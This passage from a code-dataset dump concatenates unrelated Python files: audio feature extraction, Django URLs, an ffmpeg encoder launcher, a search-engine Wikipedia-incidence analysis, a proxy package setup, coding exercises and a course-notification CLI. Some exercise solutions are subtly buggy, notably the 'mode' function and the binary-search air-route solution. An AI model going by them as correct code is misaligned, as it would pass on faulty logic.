transform(data_dict):\n \"\"\" Extract min, std, mean, max from each feature and return a single\n dimensional array\n \"\"\"\n X = np.empty(0)\n for feat, data in data_dict.items():\n mn = np.amin(data, axis=0)\n sd = np.std(data, axis=0)\n av = np.mean(data, axis=0)\n mx = np.amax(data, axis=0)\n X = np.append(X, ([mn, sd, av, mx]))\n return X\n \n","sub_path":"musicore/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"438434516","text":"from django.conf.urls import url\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom .views import User_Registration_API_View, User_Deactivate_API_View, UserExistsAPIView,All_User_API_View\n\nurlpatterns = [\n # authtoken view to retrieve the user token \n # username, password, POST\n url(r'^login/$', obtain_auth_token, name='obtain_token'),\n # username, password, first_name, last_name, email, phone_number POST\n url(r'^register/$',User_Registration_API_View.as_view(), name='register_user'),\n # token of the user through POST \n url(r'^deactivate/$', User_Deactivate_API_View.as_view(), name='deactivate'),\n # pass in a username(POST) to find out whether it is available or no\n # if username is available then error response with code 400 bad request with 'failed' name string\n # else sucess with code 200 OK with 'success' named string.\n url(r'^unique_username/$', UserExistsAPIView.as_view(), name='unique_username'),\n #Gives all user information in API form\n url(r'^all_user/$', All_User_API_View.as_view(), name='all_user'),\n]","sub_path":"Accounts/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448543793","text":"\"\"\"Programme : Encodeur graphique du JTX, codé en python avec tkinter et le module os.\nPar Raphaël Olivier, Respo archives 2014.\n\nAvant ce programme, l'encodeur utilisé était le script BATCH JTX-Encoder. Quelques problèmes :\n-Pas super user-friendly : le terminal fait peur à tout le monde depuis que l'intersection du JTX et du BR est réduite à l'ensemble vide ou presque. En plus il faut déplacer le .bat dans le dossier de destination pour que ça marche.\n-Pas très adaptable à ses besoins : deux modes et c'est tout\n-Le bidouillage du code était assez lourd parce que putain, batch c'est moche.\n\nCe programme tente de remédier à ces problèmes.\n-Il a une interface graphique\n-Le dossier où on encode est choisi dans l'interface\n-Plusieurs modes en un clic, et possibilité de choisir beaucoup d'options.\n-le code est conçu pour que l'ajout de nouveaux modes d'encodages adaptés aux besoins du JTX soit facile, tout comme l'adaptation des modes existants.\n-python, c'est un langage qui ne fait pas trop peur et qui permet de faire des interfaces et d'interagir avec le système.\n\nIl a cependant ses défauts:\n-Ce n'est plus un script : impossible de l'appeler en commande. Cependant, le fichier ffmpegLauncher sera facilement transformé en un tel script si besoin.\n-Dur de faire en sorte que python soit installé sur tous les ordis du local. Donc on manipule de gros executables qui contiennent l'interpréteur python et tous les modules utilisés.\n-Le code est nettement plus long.\n-On utilise ffmpeg depuis différents dossiers sans trimballer un ffmpeg.exe. Il faut donc que ffmpeg soit installé sur l'ordi et dans le PATH. A l'occasion de l'installation de cet encodeur le JTX2014 a ajouté ffmpeg au PATH de toutes les stations de montage. Il faudra répéter la procédure avec tout nouvel ordi (procédure détaillée dans le dossier ffmpeg, présent dans le dossier du Respo archives et à la racine de toutes les stations de montage)\n\nLe code est maldroit en plusieurs points, parce que je ne suis pas un pro de python. Si quelque chose te choque, futur respo info/archives/autre/rien, n'hésite pas à mettre ce programme à jour.\n\"\"\"\n\n\nfrom mainInterface import MainInterface # L'interface qui appelle les autres\nfrom ffmpegLauncher import FfmpegLauncher # La classe qui gère les appels à ffmpeg et la manipulation des fichiers\nfrom tkinter import * # Module python pour les interfaces graphiques. Bon chapitre dans le cours de python d'openclassrooms et doc officielle bien faite.\n\nfenetre = Tk()\ninterface = MainInterface(fenetre)\ninterface.mainloop() #La fenêtre reste ouverte jusqu'à appel de sa méthode quit\nif(interface.confirmer_lancement_encodage==1): #Vrai si on n'a pas quitté en cours de route\n\n #Avant de fermer la fenêtre, on copie les champs de l'interface. Ouais, niveau encapsulation c'est pas terrible.\n rep=interface.rep\n dict_preconfig=interface.dict_preconfig\n suppr_originaux=interface.suppr_originaux\n sous_dossier_originaux=interface.sous_dossier_originaux\n appliquer_sous_dossiers=interface.appliquer_sous_dossiers\n choix_formats=interface.choix_formats\n fenetre.destroy()\n\n #Encodage\n lanceur = FfmpegLauncher(rep,dict_preconfig,suppr_originaux,sous_dossier_originaux,appliquer_sous_dossiers,choix_formats)\n lanceur.lancer()\nelse:\n fenetre.destroy()\n","sub_path":"JTX-Encoder-GUI.py","file_name":"JTX-Encoder-GUI.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"165842489","text":"\n#%%\n# defaults\nimport json\nimport glob\nimport sys\nfrom collections import defaultdict\nfrom urllib.parse import urlparse\nfrom pprint import pprint\n\n\n# plotting\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport seaborn as sns\n\n# scipy\nimport pandas as pd\nimport numpy as np\n\nfrom PIL import Image\n\ninfinite_defaultdict = lambda: defaultdict(infinite_defaultdict)\ndef recurse_print_infinitedict(d, prefix=''):\n if type(d) != defaultdict:\n print(prefix, d)\n return\n for k, v in d.items():\n print(prefix, k)\n recurse_print_infinitedict(v, prefix + ' ')\n\n\n\n#%%\n# Display parameters\nfull_width = 8\nLH_W = 780\n\n#IPHONE_SE_H = 568\nIPHONE_6_H = 667\nIPHONE_6plus_H = 736\nIPHONE_X_H = 812\n\n#110% zoom\n# MACBOOK13_11_H = 717\n# MACBOOK13_FULL_H = 789\n# # 90% zoom\n# MACBOOK13_9_H = 877\n\n#https://gs.statcounter.com/screen-resolution-stats/desktop/worldwide\nMOST_COMMON = 768\nZOOM_90 = 853\nZOOM_110 = 698\n\n\nmobile_lines = {\n 'noscroll_lb': IPHONE_6_H,\n 'noscroll_mg': IPHONE_6plus_H,\n 'noscroll_ub': IPHONE_X_H\n}\n\ndesktop_lines = {\n 'noscroll_lb': ZOOM_110,\n 'noscroll_mg': MOST_COMMON,\n 'noscroll_ub': ZOOM_90,\n}\n\nBORDER_PIX = 1440\n\n#%%\n# Helpers\ndef extract(x):\n domain = urlparse(x.href).netloc\n return domain\n # try:\n # ret = '.'.join(domain.split('.')[:2])\n # except:\n # ret = domain\n # return ret\n\ndef norm_df(df, mobile=False):\n df['width'] = df.right - df.left\n df['height'] = df.bottom - df.top\n right_max = df['right'].max()\n bot_max = df['bottom'].max()\n\n # normalize all x-axis values relative to rightmost point\n for key in ['width', 'left', 'right']:\n df['norm_{}'.format(key)] = df[key] / right_max\n\n # normalize all y-axis values relative to bottommost point\n for key in ['height', 'top', 'bottom']:\n df['norm_{}'.format(key)] = df[key] / bot_max\n\n # treat links to DDG twitter & reddit as internal\n df.loc[df.href == 'https://twitter.com/duckduckgo', 'href'] = 'www.duckduckgo.com'\n df.loc[df.href == 'https://reddit.com/r/duckduckgo', 'href'] = 'www.duckduckgo.com'\n\n df['domain'] = df.apply(extract, axis=1)\n\n domains = [\n 'wikipedia',\n 'twitter', 'youtube',\n 'facebook',\n ]\n\n df['platform_ugc'] = df['domain'].str.contains('|'.join(\n domains\n ))\n \n for domain in domains:\n df[f'{domain}_in'] = df['domain'].str.contains(domain)\n df[f'{domain}_appears'] = (\n df['domain'].str.contains(domain) &\n (df.width != 0) & (df.height != 0)\n )\n kp_line = LH_W / right_max\n # source: \n\n if mobile:\n # no right-hand incidence\n df[f'{domain}_appears_rh'] = 0\n # no lefthand above-the-fold incidence\n df[f'{domain}_appears_lh'] = 0\n for name, line in mobile_lines.items():\n mobile_noscroll_line = line / bot_max\n\n df[f'{domain}_appears_{name}'] = (\n (df[f'{domain}_appears']) &\n (df.norm_top < mobile_noscroll_line)\n )\n\n df[f'{domain}_appears_lh_{name}'] = 0\n\n else:\n df[f'{domain}_appears_rh'] = (\n (df[f'{domain}_appears']) &\n (df.norm_left > kp_line)\n )\n\n df[f'{domain}_appears_lh'] = (\n (df[f'{domain}_appears']) &\n (df.norm_left <= kp_line)\n )\n\n for name, line in desktop_lines.items():\n noscroll_line = line / bot_max\n\n df[f'{domain}_appears_{name}'] = (\n (df[f'{domain}_appears']) &\n (df.norm_top < noscroll_line)\n )\n\n df[f'{domain}_appears_lh_{name}'] = (\n (df[f'{domain}_appears_lh']) &\n (df.norm_top < noscroll_line)\n )\n return df\n\n\n#%%\n# Experiment parameters (which experiments to load)\ndevices = [\n 'desktop',\n 'mobile'\n]\nsearch_engines = [\n 'google',\n 'bing',\n 'duckduckgo',\n]\nquery_sets = [\n 'top',\n 'med',\n 'trend',\n]\nconfigs = []\nfor device in devices:\n for search_engine in search_engines:\n for queries in query_sets:\n configs.append({\n 'device': device,\n 'search_engine': search_engine,\n 'queries': queries,\n })\n\n\n#%%\ndfs = infinite_defaultdict()\n# device, search_engine, queries\n\nerr_queries = infinite_defaultdict()\nquery_links = infinite_defaultdict()\nquery_counts = infinite_defaultdict()\n\nfor config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n print(device, search_engine, queries)\n\n k = f'{device}_{search_engine}_{queries}'\n\n folder = f'scraper_output/{device}/{search_engine}/{queries}'\n\n try:\n with open(f'{folder}/results.json', 'r', encoding='utf8') as f:\n d = json.load(f)\n except FileNotFoundError:\n d = {}\n \n n_queries = len(d.keys())\n print(' # queries collected:', n_queries)\n \n num_errs = 0\n for query in d.keys():\n try:\n links = d[query]['1_xy']\n #print(links)\n for link in links:\n #print(link)\n link['query'] = query\n query_links[device][search_engine][queries][query] = links\n except KeyError:\n err_queries[device][search_engine][queries][query] = d[query]\n num_errs += 1\n print(' # errs,', num_errs)\n for itera in [1, 2, 3, 4, 5, 6, 7]:\n try:\n err_folder = f'scraper_output/{device}/{search_engine}/errs{itera}_{device}_{search_engine}_{queries}'\n with open(f'{err_folder}/results.json', 'r', encoding='utf8') as f:\n err_d = json.load(f)\n #print(' Loaded errfile, Will take precedence over existing links for a given query')\n for query in err_d.keys():\n try:\n links = err_d[query]['1_xy']\n for link in links:\n link['query'] = query\n # if query in query_links[device][search_engine][queries]:\n # print(f'OVERWRITE: {device} {search_engine} {queries} {query}')\n # we already have this query?\n query_links[device][search_engine][queries][query] = links\n except KeyError:\n print('Key error in errfile')\n print(f' success for itera {itera}!', len(err_d.keys()))\n except Exception as e:\n err_d = {}\n\n all_links = []\n for query, links in query_links[device][search_engine][queries].items():\n all_links += links\n query_counts[device][search_engine][queries] = len(query_links[device][search_engine][queries])\n dfs[device][search_engine][queries] = norm_df(pd.DataFrame(all_links), device == 'mobile')\n\n#%%\nrecurse_print_infinitedict(query_counts)\n#%%\n# let's see which queries we're missing and write a new file to scrape them\ncmds = []\n# manual increment\nitera = 8\nfor config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n cur_queries = list(query_links[device][search_engine][queries].keys())\n\n with open(f'search_queries/prepped/{queries}.txt', 'r', encoding='utf8') as f:\n lines = f.read().splitlines()\n print(device, search_engine, queries)\n\n missing = set(lines) - set(cur_queries)\n print( 'Missing')\n print(missing)\n if missing:\n with open(\n f'search_queries/prepped/errs{itera}_{device}_{search_engine}_{queries}.txt',\n 'w', encoding='utf8') as f:\n f.write('\\n'.join(list(missing)))\n cmds.append(\n f'/usr/bin/time -v node driver.js {device} {search_engine} errs{itera}_{device}_{search_engine}_{queries} &> logs/errs{itera}_{device}_{search_engine}_{queries}.txt'\n )\nwith open(f'errs.sh', 'w') as f:\n f.write('\\n'.join(cmds))\n\n\n#%%\n# Let's see which links are most common\nfor_concat_list = []\nfor config in configs:\n device = config['device']\n if device == 'mobile':\n continue\n search_engine = config['search_engine']\n queries = config['queries']\n print(device, search_engine, queries)\n for_concat_df = dfs[device][search_engine][queries][['domain']]\n for_concat_list.append(for_concat_df)\n #print(for_concat_df['domain'].value_counts()[:20])\npd.concat(for_concat_list)['domain'].value_counts()[:15]\n\n\n#%%\n# source: https://stackoverflow.com/questions/30227466/combine-several-images-horizontally-with-python\n\n\n#%%\n# create the coordinate visualization\nDO_COORDS = False\nif DO_COORDS:\n for config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n\n print(device, search_engine, queries)\n df = dfs[device][search_engine][queries]\n if type(df) == defaultdict:\n continue\n right_max = df['right'].max()\n bot_max = df['bottom'].max()\n ratio = bot_max / right_max\n k = f'{device}_{search_engine}_{queries}'\n\n cur_queries = list(query_links[device][search_engine][queries].keys())\n np.random.seed(0)\n chosen_ones = np.random.choice(cur_queries, 10, replace=False)\n with open(f'reports/samples/{k}.txt', 'w', encoding='utf8') as f:\n f.write('\\n'.join(chosen_ones))\n for query in cur_queries + [None]:\n \n if query:\n subdf = df[df['query'] == query]\n else:\n subdf = df\n fig, ax = plt.subplots(1, 1, figsize=(full_width, full_width * ratio))\n plt.gca().invert_yaxis()\n #print('Query:', query, '# links', len(subdf))\n add_last = []\n for i_row, row in subdf.iterrows():\n if row.width == 0 or row.height == 0:\n continue\n # x = row['norm_left']\n # y = row['norm_bottom']\n # width = row['norm_width']\n # height = row['norm_height']\n x = row['left']\n y = row['bottom']\n width = row['width']\n height = row['height']\n domain = row['domain']\n\n if row['wikipedia_appears']:\n add_last.append([domain, (x,y,), width, height])\n else:\n # if row['platform_ugc']:\n # color = 'b'\n if 'google' in domain or 'bing' in domain or 'duckduckgo' in domain:\n color = 'lightgray'\n else:\n color = 'grey'\n plt.annotate(domain, (x, y), color=color)\n # Add the patch to the Axes\n rect = matplotlib.patches.Rectangle((x,y),width,height,linewidth=1,edgecolor=color,facecolor='none')\n ax.add_patch(rect)\n for domain, coords, width, height in add_last:\n plt.annotate(domain, coords, color='g')\n rect = matplotlib.patches.Rectangle(coords,width,height,linewidth=2,edgecolor=color,facecolor='none')\n ax.add_patch(rect)\n\n # kp line = lefthand width border.\n kp_line = LH_W\n if device == 'mobile':\n scroll_line = mobile_lines['noscroll_mg']\n else:\n scroll_line = desktop_lines['noscroll_mg']\n #scroll_line /= bot_max\n plt.axvline(kp_line, color='r', linestyle='-')\n\n #border_line = BORDER_PIX / right_max\n #plt.axvline(border_line, color='k', linestyle='-')\n plt.axhline(scroll_line, color='k', linestyle='-')\n\n plt.savefig(f'reports/overlays/{k}_{query}.png')\n if query == 'nba':\n plt.savefig(f'reports/{k}_{query}.png')\n plt.close()\n if query in chosen_ones:\n screenshot_path = f'scraper_output/{device}/{search_engine}/{queries}/results.json_{query}.png'\n # the overlay will be smaller\n try:\n screenshot_img = Image.open(screenshot_path)\n big_w, big_h = screenshot_img.size\n overlay_img = Image.open(f'reports/overlays/{k}_{query}.png')\n small_w, small_h = overlay_img.size\n except FileNotFoundError: \n continue\n\n h_percent = (big_h/float(small_h))\n new_w = int((float(small_w) * float(h_percent)))\n resized_overlay = overlay_img.resize((new_w,big_h), Image.ANTIALIAS)\n\n total_width = new_w + big_w\n\n new_im = Image.new('RGB', (total_width, big_h))\n\n x_offset = 0\n for im in (screenshot_img, resized_overlay):\n new_im.paste(im, (x_offset,0))\n x_offset += im.size[0]\n\n new_im.save(f'reports/samples/concat_{k}_{query}.png')\n\n\n#%%\n# toss results in here for easy dataframe creation\nrow_dicts = []\nfor config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n\n print(device, search_engine, queries)\n k = f'{device}_{search_engine}_{queries}'\n df = dfs[device][search_engine][queries]\n if type(df) == defaultdict:\n continue\n\n inc_rate = df.groupby('query').wikipedia_appears.agg(any).mean()\n rh_inc_rate = df.groupby('query').wikipedia_appears_rh.agg(any).mean()\n lh_inc_rate = df.groupby('query').wikipedia_appears_lh.agg(any).mean()\n\n\n if device == 'mobile':\n d = mobile_lines\n else:\n d = desktop_lines\n matches = set(df[df.wikipedia_appears == True]['query'])\n\n row_dict = {\n 'queries': queries,\n 'search_engine': search_engine,\n 'device': device,\n 'inc_rate': inc_rate,\n 'rh_inc_rate': rh_inc_rate,\n 'lh_inc_rate': lh_inc_rate,\n 'matches': matches\n }\n for name in d.keys():\n row_dict[f'{name}_inc_rate'] = df.groupby('query')[f'wikipedia_appears_{name}'].agg(any).mean()\n row_dict[f'lh_{name}_inc_rate'] = df.groupby('query')[f'wikipedia_appears_lh_{name}'].agg(any).mean()\n for domain in [\n 'twitter', 'youtube',\n 'facebook',\n ]:\n row_dict[f'{domain}_inc_rate'] = df.groupby('query')[f'{domain}_appears'].agg(any).mean() \n\n\n row_dicts.append(row_dict)\n#%%\nresults_df = pd.DataFrame(row_dicts)\nresults_df\n\n#%%\nresults_df[results_df['queries'] == 'med']\n\n# %%\nFP = 'Full-page incidence'\nRH = 'Right-hand incidence'\nLH = 'Left-hand incidence'\nAF_MG = 'Above-the-fold incidence'\nAF_pretty = 'Above-the-fold incidence (lower bound - upper bound)'\n\nLH_AF_pretty = 'Left-hand above-the-fold incidence (lower bound - upper bound)'\nLH_AF_LB = 'Left-hand above-the-fold incidence (lower bound)' \nLH_AF_MG = 'Left-hand above-the-fold incidence'\nLH_AF_UB = 'Left-hand above-the-fold incidence (upper bound)' \n\nAF_LB = 'Above-the-fold incidence (lower bound)'\nAF_UB = 'Above-the-fold incidence (upper bound)'\n\n\ncols = [\n 'device', 'search_engine', 'queries', 'inc_rate', 'rh_inc_rate',\n 'lh_inc_rate',\n]\nfor name in mobile_lines.keys():\n cols += [f'{name}_inc_rate', f'lh_{name}_inc_rate']\nprint(cols)\n\nrenamed = results_df[cols]\nrenamed.rename(columns={\n 'device': 'Device', 'search_engine': 'Search Engine',\n 'queries': 'Query Category', 'inc_rate': FP,\n 'rh_inc_rate': RH,\n 'lh_inc_rate': LH,\n 'lh_noscroll_lb_inc_rate': LH_AF_LB,\n 'lh_noscroll_mg_inc_rate': LH_AF_MG,\n 'lh_noscroll_ub_inc_rate': LH_AF_UB,\n 'noscroll_lb_inc_rate': AF_LB,\n 'noscroll_mg_inc_rate': AF_MG,\n 'noscroll_ub_inc_rate': AF_UB,\n 'youtube_inc_rate': 'Youtube incidence rate',\n 'twitter_inc_rate': 'Twitter incidence rate',\n}, inplace=True)\n\ndef pretty_bounds(row):\n mg = row[AF_MG]\n lb = row[AF_LB]\n ub = row[AF_UB]\n return f'{mg:.2f} ({lb:.2f} - {ub:.2f})'\n\ndef pretty_bounds_lh(row):\n mg = row[LH_AF_MG]\n lb = row[LH_AF_LB]\n ub = row[LH_AF_UB]\n return f'{mg:.2f} ({lb:.2f} - {ub:.2f})'\n\nrenamed[AF_pretty] = renamed.apply(pretty_bounds, axis=1)\nrenamed[LH_AF_pretty] = renamed.apply(pretty_bounds_lh, axis=1)\n\nrenamed.replace(to_replace={\n 'top': 'common',\n 'med': 'medical',\n 'trend': 'trending',\n}, inplace=True)\nrenamed\n\nrenamed[[\n 'Device', 'Search Engine', 'Query Category',\n FP, RH, LH, AF_pretty, LH_AF_pretty\n]].to_csv('reports/main.csv', float_format=\"%.2f\", index=False)\n\n#%%\nrenamed[\n renamed.Device == 'desktop'\n][[\n 'Search Engine', 'Query Category',\n FP, LH, RH, AF_pretty, LH_AF_pretty\n]].to_csv('reports/desktop.csv', float_format=\"%.2f\", index=False)\nrenamed[\n renamed.Device == 'mobile'\n][[\n 'Search Engine', 'Query Category',\n FP, AF_pretty\n]].to_csv('reports/mobile.csv', float_format=\"%.2f\", index=False)\n\n#%%\nrenamed\n\n#%%\nbaseline_df = results_df[['device', 'search_engine', 'queries', 'twitter_inc_rate', 'youtube_inc_rate', 'facebook_inc_rate']]\nbaseline_df.rename(columns={\n 'device': 'Device', 'search_engine': 'Search Engine',\n 'queries': 'Query Category'\n}, inplace=True)\nbaseline_df.to_csv('reports/other_domains.csv', float_format=\"%.2f\", index=False)\n\n\n\n#%%\nmelted = renamed.melt(id_vars=['Device', 'Search Engine', 'Query Category'])\nmelted.rename(columns={\n 'variable': 'y-axis',\n 'value': 'Incidence rate',\n}, inplace=True)\nsns.set()\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col=\"Device\", row='y-axis',\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n #row_order=[FP, AF, RH],\n data=melted[melted['y-axis'] == FP], kind=\"bar\",\n height=3, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/FP_catplot.png', dpi=300)\n\n#%%\n# lh vs rh\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col='y-axis',\n col_order=[LH, RH],\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n data=melted[\n ((melted['y-axis'] == LH) | (melted['y-axis'] == RH))\n & (melted['Device'] == 'desktop')],\n kind=\"bar\",\n height=3, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/LHRH_catplot.png', dpi=300)\n#%%\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col=\"Device\", row='y-axis',\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n #row_order=[FP, AF, RH],\n data=melted[melted['y-axis'] == AF_MG], kind=\"bar\",\n height=3, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/AF_catplot.png', dpi=300)\n\n#%%\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col=\"Device\", row='y-axis',\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n data=melted[melted['y-axis'] == LH_AF_MG], kind=\"bar\",\n height=2.5, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/LH_AF_catplot.png', dpi=300)\n\n\n#results_df[['device', 'queries', 'search_engine', 'inc_rate', 'matches']]\n\n\n# %%\n# differences between search engines\nresults_df.groupby(['device', 'queries']).agg(lambda x: max(x) - min(x))['inc_rate']\n\n#%%\n# differences between devices\nresults_df.groupby(['search_engine', 'queries']).agg(lambda x: max(x) - min(x))['inc_rate']\n\n#%%\n# diff between FP and AF\nmelted[\n (melted['y-axis'] == FP) | (melted['y-axis'] == AF_MG)\n].groupby(['Device', 'Query Category', 'Search Engine']).agg(lambda x: max(x) - min(x))\n\n# %%\nse_minus_se = {}\nse_to_matches = {}\nsub = results_df[(results_df.device == 'mobile') & (results_df.queries == 'top')]\nfor i, row in sub.iterrows():\n se_to_matches[row.search_engine] = set(row.matches)\nse_to_matches\nfor k1, v1 in se_to_matches.items():\n for k2, v2 in se_to_matches.items():\n if k1 == k2:\n continue\n se_minus_se[f'{k1}_{k2}'] = v1 - v2\n# what's in the first but not in the second\n\n#%%\npprint(se_minus_se)\n\n\n# %%\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":20132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"651798420","text":"import setuptools\n\n\npackage = dict(\n name = 'proxy',\n version = '0.1.0',\n author = 'Dan Gittik',\n author_email = 'dan.gittik@gmail.com',\n description = 'Context managers to route Python via proxies and TOR',\n license = 'MIT',\n url = 'https://github.com/dan-gittik/proxy',\n packages = setuptools.find_packages(),\n install_requires = [\n 'pysocks',\n 'stem',\n ],\n tests_require = [\n 'pytest',\n 'requests',\n ],\n)\n\n\nif __name__ == '__main__':\n\tsetuptools.setup(**package)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"638093523","text":"def mode(nums):\n \"\"\"Return most-common number in list.\n\n For this function, there will always be a single-most-common value;\n you do not need to worry about handling cases where more than one item\n occurs the same number of times.\n\n >>> mode([1, 2, 1])\n 1\n\n >>> mode([2, 2, 3, 3, 2])\n 2\n \"\"\"\n # keys = set(nums)\n # highest_count = 0\n # mode = None\n # for val in keys\n # if highest_count < nums.count(val)\n # mode \n\n nums.sort()\n biggest_count = 0\n curr_count = 0\n mode = None\n last_n = nums[0]\n\n for n in nums:\n if n == last_n:\n curr_count += 1\n if biggest_count < curr_count:\n biggest_count = curr_count\n mode = n \n return mode","sub_path":"17_mode/mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"266634695","text":"# APPROACH 1: TWO POINTERS\n# Time Complexity : O(n + m), n: len(forwardRouteList), m: len(returnRouteList)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : N/A\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. two pointers -> low at begining of forward list and high at end of return list. \n# 2. Each time take the sum of the distances and if within the limit -> check if greater than the max distance found so far or not\n# 3. If greater than max distance found so far, discard the previous results and form new one. If equal to the max distance found so far, append to the current result\n# 4. If current sum is greater than limit, dec high. if current sum is less than limit, inc low.\n\ndef getOptimizedUtilize(maxTravelDist, forwardRouteList, returnRouteList):\n if forwardRouteList is None or returnRouteList is None:\n return None\n\n low, high, max_so_far, result = 0, len(returnRouteList) - 1, float('-inf'), []\n while low < len(forwardRouteList) and high >= 0:\n curr_sum = forwardRouteList[low][1] + returnRouteList[high][1]\n if curr_sum <= maxTravelDist:\n if curr_sum > max_so_far:\n max_so_far = curr_sum\n result = [[forwardRouteList[low][0], returnRouteList[high][0]]]\n elif curr_sum == max_so_far:\n result.append([forwardRouteList[low][0], returnRouteList[high][0]])\n\n low += 1\n\n else:\n high -= 1\n\n return result\n\n\n\n# APPROACH 2: BINARY SEARCH\n# Time Complexity : O(n lg m), n: len(shorter route list) and m: len(longer route list)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : N/A\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. Ensure that forwardRouteList is the shorter one than returnRouteList\n# 2. For each element of the forwardRouteList, target is the max allowed distance - element and do a Binary Search for it in returnRouteList (not exact closest search)\n# 3. Keep track of global max found so far, to udate result appropriately. \n# 4. If the element is greater than target, shift to left half, else shift to right half\n\ndef getOptimizedUtilize(maxTravelDist, forwardRouteList, returnRouteList):\n if forwardRouteList is None or returnRouteList is None:\n return None\n\n if len(forwardRouteList) > len(returnRouteList):\n getOptimizedUtilize(maxTravelDist, returnRouteList, forwardRouteList)\n \n result, max_so_far = [], float('-inf')\n for route in forwardRouteList:\n target = maxTravelDist - route[1]\n low, high = 0, len(returnRouteList) - 1\n\n while low <= high:\n mid = low + (high - low) // 2\n\n if returnRouteList[mid][1] <= target:\n if max_so_far < target + route[1]:\n max_so_far = returnRouteList[mid][1] + route[1]\n result = [[route[0], returnRouteList[mid][0]]]\n else:\n result.append([route[0], returnRouteList[mid][0]])\n low = mid + 1\n\n else:\n high = mid - 1\n\n return result\n","sub_path":"Problem-3_Optimized_air_routes.py","file_name":"Problem-3_Optimized_air_routes.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"79637139","text":"import logging\nfrom argparse import ArgumentParser\nfrom datetime import datetime\n\nfrom cn_v2.manager import WatcherManager, CourseManager\n\nterm_code = {\"DA\": \"202142\", \"FH\": \"202141\"}\n\narg_parser = ArgumentParser(description=\"Course Notify Manager\")\n\narg_parser.add_argument(\"--log_file\",\n help=\"Path to log file\",\n required=False)\n\narg_parser.add_argument(\"--config_file\",\n help=\"Path to configuration file\",\n required=True)\n\narg_parser.add_argument(\"--school\",\n choices=[\"DA\", \"FH\"],\n help=\"Which school to manage\",\n required=True)\n\narg_parser.add_argument(\"-c\", \"--update_course\",\n help=\"Update all course data\",\n action=\"store_true\")\n\narg_parser.add_argument(\"-s\", \"--update_seats\",\n help=\"Update seats data only\",\n action=\"store_true\")\n\narg_parser.add_argument(\"-n\", \"--send_notification\",\n help=\"Send notification email to watchers\",\n action=\"store_true\")\n\narg_parser.add_argument(\"-v\", \"--verbose\",\n help=\"Verbose\",\n action=\"store_true\")\n\nargs = arg_parser.parse_args()\n\n\ndef print_error(msg):\n print(\"[ERROR] \" + msg)\n\n\ndef create_logger():\n logger = logging.getLogger(\"CourseNotify Logger\")\n formatter = logging.Formatter(\"[%(levelname)s][%(asctime)s][%(name)s] - %(message)s\")\n\n fh = logging.FileHandler(args.log_file)\n fh.setFormatter(formatter)\n fh.setLevel(logging.INFO)\n\n logger.addHandler(fh)\n logger.setLevel(logging.INFO)\n return logger\n\n\ncourse_manager = CourseManager(school=args.school, config_file=args.config_file, term_code=term_code)\nwatcher_manager = WatcherManager(school=args.school, config_file=args.config_file)\n\n\ndef update_course():\n course_manager.update_course_collection()\n\n\ndef update_seats():\n course_manager.update_course_collection()\n\n\ndef send_notification():\n watcher_manager.notify_all()\n\n\nif args.update_course:\n update_course()\nif args.update_seats:\n update_seats()\nif args.send_notification:\n send_notification()\n","sub_path":"script/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525489328","text":"import ipgetter\nfrom notify import sms_and_log\nimport weakref\nfrom webdriver import Browser\nfrom time import sleep\n\nclass Domain(object):\n '''Parent class for domains.\n\n Note:\n Having this class to inherent from allows for easily expanding this program\n to incorporate other domain services.\n\n Args:\n domain (str): A domain name.\n https (bool): If set true, https will be tested for the domain.\n\n Attributes:\n domain (str): Name of the domain associated with the object.\n port (int): Port number to test for connection.\n url (str): Url of the domain.\n\n '''\n\n _instances = []\n def __init__(self, domain, https=False):\n\n self.domain = domain\n self.https = https\n if not https:\n self.port = 80\n self.domain_url = 'http://' + self.domain\n else:\n self.port = 443\n self.domain_url = 'https://www.' + self.domain\n self.__class__._instances.append(weakref.proxy(self))\n\n @property\n def reachable(self):\n '''Returns:\n (bool): True if the domain is reachable and response with 200 status code,\n False 